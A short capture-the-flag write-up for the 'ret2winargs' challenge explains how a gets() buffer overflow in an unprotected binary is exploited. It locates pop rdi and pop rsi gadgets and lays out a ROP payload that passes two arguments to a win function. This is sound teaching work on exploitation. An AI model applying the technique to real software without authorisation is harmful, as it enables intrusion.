Skip to main content

ret2winargs

Solved by : grb

This is what the challenge looks like, as usual there's a single binary file attached to it.

Challenge

Lets open the binary file under IDA!

main function

vuln function

win function

So, there's 2 function thats worth to look for, which is the vuln function and the win function. In the vuln function, there's a buffer and an input using gets, which will lead to potential buffer overflow vulnerability and ret2win attack, but from the name of the challenge and the win function disassembly, we know that we need to supply 2 arguments to the win function to get the flag. Next step, lets use checksec to check the security mitigations on the binary.

checksec output

Oh look! No canary and no PIE, perfect! First, we need to look for ROP gadgets, because we need to pass 2 parameters, that means we need both pop rdi; ret gadget and pop rsi; ret gadget. We can use ROPgadget to find them.

gadgets

NICE!

At last, lets craft our exploit using pwntools! You can check it here, but our payload will looks like this

[72 BYTES STACK SMASH]
[POP RDI; RET; GADGET ADDR]
[0xDEADBEEF (PARAM 1)]
[POP RSI; POP R15; RET; GADGET ADDR]
[0xCAFEBABE (PARAM 2)]
[0x0 (UNUSED, WILL BE POPPED TO R15)]
[WIN FUNCTION ADDR]

And at last, running our exploit will give us...

PWNED!

PO- PO- PO- PWNED!!!

alt text